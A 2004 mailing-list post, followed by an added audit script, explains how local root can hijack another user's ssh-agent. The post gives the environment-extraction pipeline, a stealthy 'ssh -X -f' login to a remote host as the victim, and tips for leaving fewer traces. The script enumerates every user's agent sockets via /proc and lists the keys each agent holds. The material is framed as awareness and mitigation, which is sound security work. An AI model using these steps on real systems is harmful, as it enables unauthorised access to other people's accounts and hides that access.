Jeff Abrahamson on 24 Apr 2004 13:38:02 -0000



[PLUG] root and ssh-agent


I have long had a nagging feeling that I trust root more than I like
to think.  I confirmed today that I trust local root on every machine
that my ssh private key gives me access to, even though I have a
pass-phrase on my key.  Here's how it goes, from the viewpoint of
local root:

Suppose that I am root on machine-1, and I see that user smith is
running ssh-agent.  I don't have root on other machines (suppose), but
I see (from ps, .history, whatever) that smith often connects to
machine-2, where I have no power.

I wonder what smith does / has set up on machine-2?  So I su to smith
and then type

  $ ps ewx | grep agent | tr ' ' '\n' | grep SSH_ | sort -u | awk '{ print "export " $0; }'

The output is some bash lines that I copy and paste into my shell.  (I
could have done an eval, at the expense of already diminishing
clarity.)  This gives me access to smith's existing ssh-agent process.

Now I ssh to machine-2.  Actually, I don't want to show up in who, so
I just run an xterm: I only appear in ps and probably last,
/var/log/messages, etc.

    ssh -X -f smith@machine-2 xterm

Thanks to smith's ssh-agent, I am not asked for a password.  Now I,
root@machine-1, have full access to machine-2 as smith.


Note a few items:

    - This is neither news nor an exploit, but a known bit about ssh-agent.

    - Actually doing the above would be highly unethical and may be
      illegal depending on context.  I don't advise doing it, ever.

    - This argues against using ssh-agent on anything but your own
      machine where only you have root, or else on networks of
      machines where root is the same everywhere.

    - I'm describing this because I don't think this mechanism is
      well-known among non-sysadmins and non-security people, which
      means most people.

    - This could be made more slick and harder to notice, no doubt.
      For example, my first act on machine-2 might be to spawn a
      subshell so that when I exit I have minimal impact on
      ~/.history.  Etc.

-- 
 Jeff

 Jeff Abrahamson  <http://www.purple.com/jeff/>
 GPG fingerprint: 1A1A BA95 D082 A558 A276  63C6 16BF 8C4C 0D1D AE4B

 A cool book of games, highly worth checking out:
 http://www.amazon.com/exec/obidos/ASIN/1931686963/purple-20

Attachment: signature.asc
Description: Digital signature
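The mechanism in the message above, reduced to a small script. This is an added example and not code from Jeff's post: it turns the `ps ewx` pipeline into a function (with its closing quote supplied), then does the same job the robust way by reading `/proc/<pid>/environ`, which is what a root user on a shared host would actually use to enumerate every reachable agent socket, and finally asks each agent what keys it holds with `ssh-add -l`. It assumes a Linux-style `/proc` with NUL-separated `environ` files; the file name `agent-audit.sh` and the sample `ps` line and fake `/proc` tree used for testing are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original post. Helpers for the agent-hijack
# mechanism described above, written from the auditor's side: find every
# ssh-agent socket reachable from this host and ask each agent what it holds.
# Assumes a Linux-style /proc with per-process environ files (NUL-separated
# KEY=value pairs). The test feeds it a constructed fake tree.
set -e

# The pipeline from the post as a function, with the missing closing quote
# supplied. Reads `ps ewx` style output on stdin and emits one
# `export VAR=value` line per unique SSH_* variable, ready to eval.
# Fragile by construction: it depends on ps formatting and on values that
# contain no spaces.
agent_exports_from_ps() {
    LC_ALL=C grep agent | tr ' ' '\n' | grep '^SSH_' | LC_ALL=C sort -u \
        | awk '{ print "export " $0; }'
}

# Extract SSH_AUTH_SOCK from one /proc/<pid>/environ file. Prints nothing
# if the variable is absent or the file is unreadable.
auth_sock_from_environ() {
    tr '\000' '\n' < "$1" 2>/dev/null | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1
}

# Walk a /proc-like tree ($1, default /proc) and print "<pid> <socket>" for
# each distinct agent socket found in some process's environment. As root
# this covers every user's agents; as an ordinary user only your own
# processes' environ files are readable, which is exactly the asymmetry the
# post is about.
list_agent_sockets() {
    procdir=${1:-/proc}
    for env in "$procdir"/[0-9]*/environ; do
        [ -r "$env" ] || continue
        pid=${env#"$procdir"/}
        pid=${pid%/environ}
        sock=$(auth_sock_from_environ "$env")
        if [ -n "$sock" ]; then
            printf '%s %s\n' "$pid" "$sock"
        fi
    done | LC_ALL=C sort -u -k2,2
}

# Ask the agent behind a socket which keys it holds. This is the check a
# hijacker makes before connecting anywhere, and the one an auditor makes
# to see whose keys are exposed on a shared host. Needs a live agent, so
# the test does not call it.
agent_keys() {
    SSH_AUTH_SOCK=$1 ssh-add -l
}

# Usage: sh agent-audit.sh audit   (hypothetical file name; run as root to
# see all users' agents). With no argument only the functions are defined.
case "${1:-}" in
    audit)
        list_agent_sockets | while read -r pid sock; do
            printf '== pid %s socket %s\n' "$pid" "$sock"
            agent_keys "$sock" || true
        done
        ;;
esac
```

Two things worth knowing that go a little beyond the post. First, this only finds agents that some live process still points at; sockets whose owner has logged out but whose agent is still running can be found with `find /tmp -type s -name 'agent.*'`. Second, the exposure can be narrowed even where you cannot avoid ssh-agent on a shared box: `ssh-add -c` makes the agent ask for confirmation (through ssh-askpass) before each use of the key, `ssh-add -t` or `ssh-agent -t` gives loaded keys a lifetime, and `ssh -A` agent forwarding hands the same access to root on every remote host you forward into, so it should be off unless you need it.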